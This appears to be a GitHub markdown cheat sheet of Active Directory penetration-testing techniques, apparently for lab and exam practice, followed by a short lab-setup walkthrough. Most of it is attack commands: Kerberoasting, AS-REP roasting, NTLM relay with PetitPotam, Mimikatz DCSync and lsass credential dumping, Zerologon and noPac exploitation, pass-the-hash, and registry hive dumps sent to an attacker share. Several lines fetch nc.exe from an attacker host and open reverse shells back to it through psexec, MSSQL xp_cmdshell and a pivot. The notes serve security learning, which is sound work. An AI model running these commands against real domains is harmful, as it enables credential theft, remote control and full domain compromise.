Skip to content

Latest commit

Β 

History

History
1125 lines (808 loc) Β· 34.8 KB

AD.md

File metadata and controls

1125 lines (808 loc) Β· 34.8 KB
Raw

πŸ“‚ Learning resources

https://www.hackingarticles.in/active-directory-pentesting-lab-setup/

https://twitter.com/hackthebox_eu/status/1529122562038456320?cxt=HHwWgICzhcu3xLgqAAAA

https://tryhackme.com/room/breachingad

https://academy.hackthebox.com/module/details/143

https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md

https://wadcoms.github.io/

https://zer1t0.gitlab.io/posts/attacking_ad/#what-is-active-directory

active-directory-attack-methods

https://www.amazon.com/Pentesting-Active-Directory-Windows-based-Infrastructure/dp/1804611360/ref=cm_cr_arp_d_product_top?link_from_packtlink=yes

a lot about the AD pentest explanations

https://www.youtube.com/channel/UCpoyhjwNIWZmsiKNKpsMAQQ

AD mindmap
https://orange-cyberdefense.github.io/ocd-mindmaps/
https://github.com/Orange-Cyberdefense/ocd-mindmaps
https://postimg.cc/mtz8kCdB from https://www.reddit.com/r/oscp/comments/14uoni4/i_passed_80_points_no_bonus/
https://xmind.app/m/vQuTSG/ (credit:@y0u553f5433d)

DACL abuse

https://www.thehacker.recipes/ad/movement/dacl

Security identifier (SID) and Relative identifier (RID)
https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/security-identifiers

A vulnerable AD environment for penetration testing practice

https://github.com/Orange-Cyberdefense/GOAD

Offensive PowerShell for red team

https://github.com/samratashok/nishang

πŸ“‚ Allowed Tools

Be sure to check the restrictions on the use of tools before taking the exam.

  • BloodHound (SharpHoundCheatSheet)
  • SharpHound
  • PowerShell Empire
  • Covenant
  • Powerview
  • Rubeus
  • evil-winrm
  • Responder (Poisoning and spoofing are not allowed in the labs or on the exam.)
    • To run in analyze mode, use the "-A" parameter.
    • To display the hash every time, use the "-v" parameter.
    sudo responder -I tun0 -A -v
  • Crackmapexec => NetExec
  • Mimikatz
WinRM HTTP port 5985, WinRM HTTPS port 5986

πŸ“‚ Other Tools

  • linWinPwn - Active Directory Vulnerability Scanner
  • ADMiner - Using Cypher queries on the BloodHound graph database (Neo4j) generates a web-based report

πŸ“‚ Flow (WIP)

AD drawio

πŸ“‚ Commands And Tools

service scan, domain information, check for null sessions, shares

enum4linux-ng

enum4linux-ng -A <target ip> 
# -A all simple enumeration

Enumerating Users

add target domain /etc/hosts, if needed

127.0.0.1 localhost
<target domain ip> <Active Directory Domain>

NTLM relay attack

https://en.hackndo.com/ntlm-relay/
https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/ms-efsr
SMB NTLM blocking now supported in Windows Insider

# listening
python3 ntlmrelayx.py --remove-mic --escalate-user <username> -t ldap://<attacker ip> -smb2support  
# launch
python3 PetitPotam.py -d <domain> -u <username> -p <password> <attacker ip> <target ip>

Dumping LDAP

ldapsearch -LLL -x -H ldap://<target ip> -b '' -s base '(objectclass=*)'
# with credential, e.g., domain = test.local
# pay attention to each user's information, for example, the samaccountname
ldapsearch -H ldap://<target ip> -x -W -D "<username>@test.local" -b "dc=<test>,dc=<local>"
ldapsearch -H ldap://<target ip> -x -W -b "dc=<test>,dc=<local>"
# check the dump file's content, e.g., domain_users.json, the value of key "info"
ldapdomaindump -u '<domain>\<username>' -p '<password>' <HOSTNAME or target ip>

other LDAP queries tool

# https://github.com/ropnop/go-windapsearch
./windapsearch -d <domain> --dc <domain controller>

search smb vulnerability

nmap --script "safe or smb-enum-*" -p 445 <target ip>

Read gMSA password (ReadGMSAPassword and AllowedToDelegate rights) (HTB BOX:Intelligence)

git clone https://github.com/micahvandeusen/gMSADumper.git
python3 gMSADumper.py -u <username> -p <password> -d <domain>

enumerate domain usernames

Kerbrute

# 1 enumerate users 
kerbrute_linux_amd64 -t <threads> --dc <domain controller> -d <domain> userenum  ~/Documents/userlist.txt
# 2 valid users
kerbrute userenum -d <domain> --dc <domain controller> ~/Documents/userlist.txt | grep "USERNAME" | cut -f1 -d"@" | cut -f4 -d":" | tr -d "[:blank:]" > /tmp/users.txt
# bruteuser
./kerbrute_linux_amd64 -t <threads> --dc <domain controller> -d <domain> bruteuser ~/Documents/rockyou.txt <username>
# passwordspray
./kerbrute_linux_amd64 -t <threads> --dc <domain controller> -d <domain> passwordspray <userlist> '<password>'
# crackmapexec needs valid credential
crackmapexec smb <target ip> -u <username> -p <password> --users
# bruteforcing the RID (enumerate users)
crackmapexec <protocol> <target ip(s)> -u <username> -p <password> --rid-brute 10000

change password (STATUS_PASSWORD_MUST_CHANGE)

smbpasswd -U <user_name> -r <target ip>

mount Windows shares

mount -t cifs //<target ip>/<folder> <attacker folder> -o username=<username>

get SID

python3 getPac.py -targetUser <target username> <domain>/<username>[:password]

Setspn

Windows command-line tool for enumerating SPNs, built in after windows server 2008

# check all the SPN services 
setspn -Q */*

Enter-PSSession

$password = ConvertTo-SecureString "<password>" -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential ("<username>", $password )
Enter-PSSession -ComputerName <computer_name> -Credential $cred

rubeus asreproast

.\rubeus.exe asreproast

# modify hash insert $23 after $krb5asrep 
# $krb5asrep$23$......

.\hashcat.exe -a 0 -m 18200 .\hash .\Pass.txt

πŸ“‚ BloodHound

‼️ Edges: relationship between nodes, direct of attack

https://blog.spookysec.net/Enriching-BloodHound-Data/

https://github.com/ShutdownRepo/The-Hacker-Recipes/tree/master/ad/movement/dacl

AddMembers
Addself
ForceChangePassword
GenericAll
WriteDACL
GenericWrite
WriteOwner
AllExtendedRights
SQLAdmin
CanRDP
CanPSRemote (Evil-WinRM, usually at port 5985)

collecting data in Windows

.\SharpHound.exe -c all --zipfilename ad_data

collecting data in Linux

# normal
python3 bloodhound.py -ns <nameserver ip> -d <domain> -c all -u <username> -p <password> --zip
# proxychains
proxychains python3 bloodhound.py -ns <nameserver ip> -d <domain> -c all -u <username> -p <password> --zip --dns-tcp

Cypher (Neo4j's query language) Query

bloodhound-cypher-cheatsheet

https://posts.specterops.io/cypher-queries-in-bloodhound-enterprise-c7221a0d4bb3

# return nodes with direct relationships
MATCH c=(a)-[:CanPSRemote]->(b) RETURN c
# Find SPNs with keywords 
MATCH (u:User) WHERE ANY (x IN u.serviceprincipalnames WHERE toUpper(x) CONTAINS '<search string>') RETURN u
# retrieve computers
MATCH (c:Computer) [WHERE c.operatingsystem CONTAINS "<search string>"] RETURN c
# PowerShell command:Test-Connection -ComputerName <ComputerName> -Count 1 | Select-Object -ExpandProperty IPV4Address
  • GenericAll

Windows

Import-Module .\PowerView.ps1
<# valid credential #>
$SecPassword = ConvertTo-SecureString '<password>' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('<domain>\<username>', $SecPassword)
<# fake SPN #>
Set-DomainObject -Credential $Cred -Identity <specific user> -SET @{serviceprincipalname='<service class>/<host>'} -Verbose
<# Kerberoasting #>
.\Rubeus.exe kerberoast /user:<specific user> /nowrap
<# password recovery #>
.\hashcat.exe -a 0 -m 13100 .\hash .\rockyou.txt

steps example

$User = 'VITAMIN\Ted';$Pass = ConvertTo-SecureString 'P@ssword789' -AsPlainText -Force;$Cred = New-Object System.Management.Automation.PSCredential($User, $Pass)

Set-DomainObject -Credential $Cred -Identity administrator -SET @{serviceprincipalname='ANYNAME/test000'}

.\Rubeus.exe kerberoast /user:administrator /nowrap /creduser:VITAMIN\Ted /credpassword:'P@ssword789' /spn:"ANYNAME/test000"

if we can't recovery password

$User = 'VITAMIN\Ted';$Pass = ConvertTo-SecureString 'P@ssword789' -AsPlainText -Force;$Cred = New-Object System.Management.Automation.PSCredential($User, $Pass)
<# change target user's password #>
$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

Set-DomainUserPassword -Identity administrator -AccountPassword $UserPassword -Credential $Cred
  • ForceChangePassword
# group member who has permission
Add-ADGroupMember "<groupname>" -Members "<ADAccount>" 
# checking user alreay in the group
Get-ADGroupMember -Identity "<groupname>"
# start to change password 
$password = ConvertTo-SecureString "<password>" -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential ("<ADAccount>", $password )
# using same password to change target user's password
Set-ADAccountPassword -Identity "<Target ADAccount>" -Reset -NewPassword $password -Credential $cred
# if access denied, reconnect
gpupdate /force

# we can use Enter-PSSession to connect to target host
$cred = New-Object System.Management.Automation.PSCredential ("<Target ADAccount>", $password )
Enter-PSSession -ComputerName <computer_name> -Credential $cred

πŸ“‚ PowerView

Import-Module .\PowerView.ps1
# check if loading is successful
Get-Module
# Groups
Get-NetGroup
# member of the target group
Get-NetGroup "Domain Admins" | select member
# Computers
Get-NetComputer -fulldata
# select
Get-NetComputer -fulldata | select operatingsystem
# Users
Get-NetUser
Get-NetUser | select cn
# find AD users
Get-ADUser -Identity <AD account> -Server <domain controller> -Properties *
Get-ADUser -Filter * -Properties * | select Name, SamAccountName, Description
Get-DomainUser -Identity <AD account> -Properties MemberOf, objectsid
# password last set
Get-NetUser -properties name, pwdlastset, logoncount, badpwdcount
# GroupMembers
Get-ADGroupMember -Identity <groupname>
# find some special messages in description
Get-DomainUser -LDAPFilter "Description=*built*" | Select name,Description

Kerberoasting

get user TGS ticket

Get-DomainUser -Identity <AD account> | Get-DomainSPNTicket -Format Hashcat
targetedKerberoast.py -d <domain> -u <username> -p <password> --dc-ip <dc ip>
# john /tmp/hashes --wordlist=rockyou.txt
# hashcat -m 13100 --force -a 0 hashes rockyou.txt

πŸ“‚ CrackMapExec

Pwn3d!:domain admin flag

# brute forcing, server may block brute-force attack
crackmapexec <protocol> <target ip> -u <user_list.txt> -p <password_list.txt>
# testing user = password
crackmapexec <protocol> <target ip> -u <user_list.txt> -p <user_list.txt> --no-bruteforce
# bruteforcing the RID (enumerate users)
crackmapexec <protocol> <target ip(s)> -u <username> -p <password> --rid-brute 10000
# check password policy
crackmapexec <protocol> <target ip> --pass-pol
# using existing credentials and users to find more credentials 
crackmapexec <protocol> <target ip> -u /tmp/users.txt -p <password> --continue-on-success
# using low privilege user to enumerate more users
crackmapexec <protocol> <target ip> -u <username> -p <password> --users
# using low privilege user to enumerate more groups
crackmapexec <protocol> <target ip> -u <username> -p <password> --groups
# enumerate logged users on multiple servers
crackmapexec <protocol> <target ip(s)> -u <username> -p <password> --loggedon-users
# enumerate shares on multiple servers
crackmapexec <protocol> <target ip(s)> -u <username> -p <password> --shares
# log on with a local non-domain account
crackmapexec <protocol> <target ip(s)> -u <username> -p <password> --local-auth
# enumerate local user shares
crackmapexec <protocol> <target ip(s)> -u <username> -p <password> --local-auth -shares
# enumerate active sessions
crackmapexec <protocol> <target ip(s)> -u <username> -p <password> --session
# list readable share files
crackmapexec <protocol> <target ip(s)> -u <username> -p <password> -M spider_plus
# using NTLM hash (NTDS.dit) to check credentials
# e.g., Administrator:500:aad3b435b51404eeaad3b435b51404ee:a8a3b1fee7718533175de682804c417a:::
crackmapexec smb <target ip(s)> -u <username> -H 'LM:NT'
# crackmapexec smb test.local -u Administrator -H 'aad3b435b51404eeaad3b435b51404ee:a8a3b1fee7718533175de682804c417a'
crackmapexec smb <target ip(s)> -u <username> -H 'NTHASH'
# crackmapexec smb test.local -u Administrator -H 'a8a3b1fee7718533175de682804c417a'

# anonymous access
crackmapexec smb <target ip> -u 'anonymous' -p '' --shares   

# Zerologon
crackmapexec smb <target ip> -u <username> -p <password> -M zerologon
# PetitPotam
crackmapexec smb <target ip> -u <username> -p <password> -M petitpotam
# noPAC
crackmapexec smb <target ip> -u <username> -p <password> -M nopac

πŸ“‚ dsquery

Windows

userAccountControl

OID: LDAP Matching Rules

# http://www.selfadsi.org/ads-attributes/user-userAccountControl.htm
# userAccountControl:<LDAP_MATCHING_RULE OID>:=<flags (sum) value>
# inactive accounts (ACCOUNTDISABLE=2)
dsquery * -filter "(userAccountControl:1.2.840.113556.1.4.803:=2)"

πŸ“‚ rpcclient

If null session is enabled on the network. Server may have null session vulnerability but unable to enumerate because of permission settings.

# null session
rpcclient -U "" -N <target ip>
# -U username
# -N no password

# If you cannot enumerate, you must provide a valid credentail 
rpcclient -U <username> --password <password> <target ip> 

rpcclient $> querydominfo
# Domain info
rpcclient $> lookupdomain <domain_name>
# Domain info (include SID)
rpcclient $> querydispinfo
# Query display info (include RID)
rpcclient $> queryuser <RID> or <username>
# Query domain user group 
rpcclient $> queryusergroups <RID>
# Enumerate domain users (include RID)
rpcclient $> enumdomusers
# Enumerate domain groups
rpcclient $> enumdomgroups
# Enumerate alias groups
rpcclient $> enumalsgroups <builtin> or <domain> 
# Enumerate domains
rpcclient $> enumdomains
# Enumerate privileges
rpcclient $> enumprivs
# Get domain password info
rpcclient $> getdompwinfo
# Get user domain password info
rpcclient $> getusrdompwinfo <RID> 
# Enumerate the LSA SIDs
rpcclient $> lsaenumsid
# Lookup SID
rpcclient $> lookupsids <SID>
# Enumerate SIDs privileges
rpcclient $> lsaenumacctrights <SID>
# Enumerate shares
rpcclient $> netshareenum
# Enumerate all shares
rpcclient $> netshareenumall
# Details of share
rpcclient $> netsharegetinfo <sharename>
# Lookup username to RID
rpcclient $> samlookupnames domain <username>
# Lookup RID to username
rpcclient $> samlookuprids domain <RID>
# Query LSA policy
rpcclient $> lsaquery
# Create a new user
rpcclient $> createdomuser <username>
# Set new user's password <level>:USER_INFORMATION_CLASS number e.g., 24 (https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-samr/6b0dff90-5ac0-429a-93aa-150334adabf6?redirectedfrom=MSDN)
rpcclient $> setuserinfo2 <username> <level> <password>
# installed and share printers
rpcclient $> enumprinters

πŸ“‚ Psexec.py

Microsoft PsExec Tool (ADMIN$)

get interactive shell on the Windows host (ADMIN$ or C$ must be writeable)

psexec.py <domain>/<username>:'<password>'@<target ip>
# example
psexec.py punipunidenki.local/administrator:'f!wef23424;'@192.168.9.100 "-e cmd.exe 192.168.9.123 4444" -c ~/Documents/nc.exe
# -c pathname copy the filename for later execution, arguments are passed in the command option

πŸ“‚ Krbrelayx

# add AD Integrated DNS records
python3 dnstool.py -u '<domain>\<username>' -p <password> <target ip> -a add -r <TARGETRECORD> -d <attacker ip> -t A
# get information in a few minutes 
sudo responder -I tun0 # poisoning and spoofing are not allowed in the labs or on the exam

πŸ“‚ Extracting

secretsdump.py: extracting the password hash from ntds.dit

# 1
secretsdump.py -ntds /tmp/ntds.dit -system /tmp/SYSTEM local -outputfile /tmp/ADHashes.txt
# 2
impacket-secretsdump <username>:<password>@<domain or IP> -dc-ip <domain controller ip>

getTGT.py: get a Kerberos ticket and use it to access other services

# If in VirtualBox, disabling time synchronization between the virtual machine and the host.
sudo service virtualbox-guest-utils stop
# synchronize with server time
sudo ntpdate <target ip> # sudo apt-get -y install ntpdate
#
getTGT.py -hashes '<LMHASH:NTHASH>' <domain>/<username>
# Kerberos credentials cache
export KRB5CCNAME=<username>@<domain>.ccache
export KRB5CCNAME=<TGT_ccache_file>
# showing Kerberos credentials cache
klist
# login method1
python3 psexec.py -k -no-pass <target>
# login method2
wmiexec.py -k -no-pass <target>

reg.py: remote registry manipulation tool through the MS-RRP (Windows Remote Registry Protocol)

reg.py <domain>/<valid username with domain> -hashes '<LMHASH:NTHASH>' query -keyName <Registry Root Keys>
# Registry Root Keys: HKCR, HKCU, HKLM, HKU, HKCC
  • BACKUP OPERATORS
python smbserver.py -smb2support share /tmp

reg.py "<domain>"/"<backup_operator_username>":"<password>"@"<dc ip>" save -keyName 'HKLM\SAM' -o '\\<attacker ip>\share'
reg.py "<domain>"/"<backup_operator_username>":"<password>"@"<dc ip>" save -keyName 'HKLM\SYSTEM' -o '\\<attacker ip>\share'
reg.py "<domain>"/"<backup_operator_username>":"<password>"@"<dc ip>" save -keyName 'HKLM\SECURITY' -o '\\<attacker ip>\share'

secretsdump.py -sam SAM -system SYSTEM -security SECURITY LOCAL
# find the string below
# $MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:9b5ccb9700e3ed723df08132357ff6a1
secretsdump.py <domain>/'<machine accounts>'@<dc ip> -hashes <LMHASH:NTHASH>
# e.g., secretsdump.py test.com/'DC01$'@192.168.0.100 -hashes :9b5ccb9700e3ed723df08132357ff6a1

If running reg.py times out, we can use the following executable, which needs to be compiled.

BackupOperatorToDA

python smbserver.py -smb2support share /tmp

It requires some time.

# Use the -h parameter to check if our compiled file is correct."
.\BackupOperatorToDA.exe -t \\<TARGET or dc> -u <username> -p <password> -d <domain> -o \\<attacker ip>\share

πŸ“‚ Group Policy Preferences File (GPP cracking)

Groups.xml

gpp-decrypt <Groups.xml cpassword strings>

πŸ“‚ Kerberoasting

service logon account with SPN services

# valid domain credentials
python3 GetUserSPNs.py <domain>/<username>:<password> -dc-ip <domain controller ip> 

python3 GetUserSPNs.py <domain>/<username>:<password> -dc-ip <domain controller ip> -request -output <hashfile>

hashcat -a 0 -m 13100 <hashfile> ~/Documents/rockyou.txt

πŸ“‚ ASREPRoast

GetNPUsers

python3 GetNPUsers.py <domain>/ -dc-ip <domain controller ip> -usersfile <userlist> -format hashcat -outputfile <hashes> -no-pass
# directly output
python3 GetNPUsers.py <domain>/ -dc-ip <domain controller ip> -usersfile <userlist> -format hashcat -no-pass
python3 GetNPUsers.py <domain>/ -dc-ip <domain controller ip> -format hashcat -outputfile <hashes>
# hashcat -> 18200

πŸ“‚ impacket smbclient.py

different from the smb tool smbclient

python3 getTGT.py <domain>/<username>:<password> -k -dc-ip <domain controller ip>
# -k: use Kerberos authentication.
export KRB5CCNAME=<username>.ccache
python3 smbclient.py -no-pass -k <domain>/<username>@<targetName or ip>

impacket other services

🏷️ MSSQL

python3 mssqlclient.py [[domain/]username[:password]@]<targetName or ip> -k -no-pass
# -k -no-pass: use the credentials in the ccache file for Kerberos authentication

sysadmin or serveradmin roles

EXEC sp_configure 'show advanced options', '1'
RECONFIGURE

EXEC sp_configure 'xp_cmdshell', '1' 
RECONFIGURE

EXEC xp_cmdshell 'C:\Windows\Temp\nc.exe -e cmd.exe <attacker ip> <attacker port>';

πŸ“‚ Mimikatz

Windows

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Mimikatz.md
https://github.com/gentilkiwi/mimikatz

ERROR kuhl_m_sekurlsa_acquireLSA ; Logon list
  • UAC-bypass

If we are already in the administrators group but are unable to execute Mimikatz.

ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061 non admin

https://github.com/k4sth4/UAC-bypass

  • DCSync
.\mimikatz.exe
privilege::debug
<# already a domain administrator #> 
lsadump::dcsync /domain:<domain> /dc:<domain controller> /user:<specific user>
<# authuser with Replicating Directory Changes and Replicating Directory Changes All permissions #>
lsadump::dcsync /domain:<domain> /dc:<domain controller> /user:<specific user> /authuser:<authuser> /authdomain:<authdomain> /authpassword:<authpassword> /authntlm
<# e.g., lsadump::dcsync /domain:TEST.LOCAL /user:user01 /authuser:vitamin /authdomain:TEST /authpassword:"eRFWE5756872Gn" /authntlm #>
  • Exporting AD member hashes
REM create a snapshot
ntdsutil snapshot "activate instance ntds" create quit quit
REM mount a snapshot
ntdsutil "activate instance ntds" snapshot "mount {GUID}" quit quit
REM copy file
copy C:\$SNAP_{X}_VOLUMEC$\windows\NTDS\ntds.dit c:\users\administrator\desktop\ntds.dit

download ntds.dit to our pc

secretsdump.py -ntds /tmp/ntds.dit -system /tmp/SYSTEM local -outputfile /tmp/ADHashes.txt
  • Dumping tickets
sekurlsa::tickets
  • Dumping credentials from lsass
.\mimikatz.exe "log" "privilege::debug" "sekurlsa::logonpasswords" "exit"
  • Pass the Hash

We can also reuse the same hash.

impacket-psexec "Administrator":@10.10.10.10 -hashes ":8846f7eaee8fb117ad06bdd830b7586c"
# reuse
impacket-psexec "Administrator":@10.10.10.11 -hashes ":8846f7eaee8fb117ad06bdd830b7586c"

πŸ“‚ URL File Attack

https://www.hackingloops.com/url-file-attack-and-printnightmare/

Add the symbol "@" or "~" at the beginning of the file name, and the file extension is "url".

sudo responder -I tun0 -A -v

Upload our payload @test.url to a possible path.

[InternetShortcut]
URL=anything
WorkingDirectory=anything
IconFile=\\<attacker ip>\%USERNAME%.icon
IconIndex=1

πŸ“‚ Vulnerabilities

git clone https://github.com/Ridter/noPac.git

sudo python3 scanner.py <domain>/<username>:<password> -dc-ip <domain controller> -use-ldap

method1 interactive shell

# Use the full path to get files
sudo python3 noPac.py <domain>/<username>:<password> -dc-ip <domain controller> -dc-host <hostname> -shell --impersonate administrator -use-ldap

method2 using TGT_ccache_file

# specify the new username and password with administrator permission
sudo python3 noPac.py <domain>/<username>:<password> -dc-ip <domain controller> -dc-host <hostname> --impersonate administrator -use-ldap -target-name 'admin01' -new-pass 'Welcome123@'
# using cache file
export KRB5CCNAME=<TGT_ccache_file>
# showing Kerberos credentials cache
klist
# login method1
python3 psexec.py -k -no-pass <target>
# login method2
wmiexec.py -k -no-pass <target ip or FQDN>

πŸ“‚ Remote Tools

Windows

winrs

winrs -R:<host> -u:<username> -p:<password> cmd

πŸ“‚ Pivoting with chisel & proxychains

reference

attacker

# ./chisel server -p 80 --reverse -v
./chisel server -p <attacker port> --reverse -v

target

Windows

.\chisel.exe client <attacker ip>:<attacker port> R:socks

Linux

# transport target service on port 1234 to our pc(192.168.10.100) port 5678
# ./chisel client 192.168.10.100:80 R:5678:localhost:1234
# nmap -sC -sV -p5678 192.168.10.100 -Pn
./chisel client <attacker ip>:<attacker port> R:<attacker service port>:localhost:<target service port>

using proxychains

cat /etc/proxychains4.conf
# using socks5
# #socks4         127.0.0.1 9050
# socks5  127.0.0.1 1080

proxychains evil-winrm -i '<target ip>' -u '<username>'
proxychains impacket-psexec "<username>":'<password>'@<target ip>
# certutil -urlcache -split -f "<remote_file_path>" "<local_file_path>"
# certutil -urlcache -split -f "http://<attacker ip>/nc.exe" "C:\Users\<username>\Desktop\nc.exe"

additional use

port forwarding to access MySQL

/* attacker */
./chisel server -p 4547 --reverse -v
/* target */
.\chisel.exe client 192.168.10.100:4547 R:4748:localhost:3306

/* MySQL */
mysql -h 127.0.0.1 -u root -p '' -P 4748
SELECT LOAD_FILE('C:\\Windows\\System32\\drivers\\etc\\hosts') AS Result;
SELECT LOAD_FILE('C:\\Users\\Public\\Documents\\poc.dll') INTO DUMPFILE "C:\\Windows\\System32\\poc.dll";

πŸ“‚ Pivoting with Ligolo-ng

https://www.youtube.com/watch?v=DM1B8S80EvQ

https://github.com/nicocha30/ligolo-ng/releases

target internal address

10.11.20.0/24

target A 10.11.20.100
target B 10.11.20.110

step1. attacker machine

$ sudo ip tuntap add user kali mode tun ligolo
$ sudo ip link set ligolo up
$ ./proxy -selfcert

step2. target A machine

# 11601 is Ligolo-ng default listen port
.\agent.exe -connect <attacker ip>:11601 -ignore-cert

step3. attacker machine

new terminal

$ sudo ip route add <target internal address>/<Netmask> dev ligolo # 10.11.20.0/24
$ ip route list

step4. attacker machine

org terminal Ligolo-ng

ligolo-ng >> session # select the agent
ligolo-ng >> start

step5. attacker machine

We can start the scanning now

crackmapexec smb <target internal address>/<Netmask>

step6. attacker machine

add listener

ligolo-ng >> listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4444 # for reverse shell
ligolo-ng >> listener_add --addr 0.0.0.0:1235 --to 127.0.0.1:8000 # for downlaoding file
ligolo-ng >> listener_list

step7. attacker machine

new terminal

$ sudo nc -nlvp 4444

step8. target B machine

.\nc.exe -e cmd.exe <target A machine> <target A machine listen port> 
# .\nc.exe -e cmd.exe 10.11.20.100 1234
# 1234 => 4444

step9. attacker machine get a shell

πŸ“‚ MSSQL

Extract hash from MDF

john --format=mssql12 --wordlist=<rockyou.txt> hash
/* python3 mssqlclient.py [[domain/]username[:password]@]<targetName or ip> */
/* sysadmin fixed server role */
enable_xp_cmdshell
xp_cmdshell "powershell.exe wget http://<attacker ip>/nc.exe -OutFile c:\\Users\Public\\nc.exe"
xp_cmdshell  "c:\\Users\Public\\nc.exe -e cmd.exe <attacker ip> <attacker port>"

πŸ“‚ Zerologon

https://github.com/VoidSec/CVE-2020-1472

./cve-2020-1472-exploit.py -n <DC_NAME> -t <dc-ip>
# [+] Success: Target is vulnerable!                                                                                                         
# [-] Do you want to continue and exploit the Zerologon vulnerability? [N]/y 
# y
# [+] Success: Zerologon Exploit completed! DC's account password has been set to an empty string.
python secretsdump.py -no-pass -just-dc <domain>/'DC_NETBIOS_NAME$'@<dc-ip>
# e.g., python secretsdump.py -no-pass -just-dc test.local/'USER01$'@10.10.10.168
# remote login
impacket-psexec "<username>":@<target ip> -hashes "<NTLM hash>"
# default 5989 port
evil-winrm -i <target ip> -u <username> -H '<NTLM hash>'

πŸ“‚ AD Recycle Bin

find hidden information

Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties *

πŸ“‚ GPO Abuse

https://ppn.snovvcrash.rocks/pentest/infrastructure/ad/gpo-abuse
https://github.com/FSecureLABS/SharpGPOAbuse

Permission : GpoEditDeleteModifySecurity

πŸ“‚ tool debug

ticket_converter.py (convert ticket to UNIX <-> Windows format)

modify KeyBlock to KeyBlockV4

ImportError: cannot import name 'KeyBlock' from 'impacket.krb5.ccache'

Mimikatz

Try using an older version.

sekurlsa::logonpasswords
mimikatz # ERROR kuhl_m_sekurlsa_acquireLSA ; Key import

Try using the latest version.

mimikatz # ERROR kuhl_m_sekurlsa_acquireLSA ; Logon list

πŸ“‚ Test Environment

First we have to set up AD server, we can use the evaluation edition of windows sever. I chose to download the VHD version.

https://www.microsoft.com/en-us/evalcenter/evaluate-windows-server-2022#Get-started

Use the previously downloaded VHD file to create a virtual machine.

image

image

image

After creating the virtual machine, switch the network to bridged.

image

Install the AD service.

image

image

image

image

image

image

Create domain control.

image

image

Add a new forest.

image

image

image

image

image

image

image

image

image

Create a user account.

image

image

image

image

The AD server and user account are ready. Next we create a clinet pc environment. We can download the ISO file and use it to create virtual machine.

https://www.microsoft.com/en-us/software-download/windows11

Remembering to switch client virtual machine's network to bridged too. You can also test whether the connection between client to AD server is work.

Setting up DNS server in our client pc. The DNS server is the same as the AD server.

image

Now we can join the domain. (If you get an error when you join, try disabling IPv6.)

image

image

image

image

image

Disabling IPv6.

image

image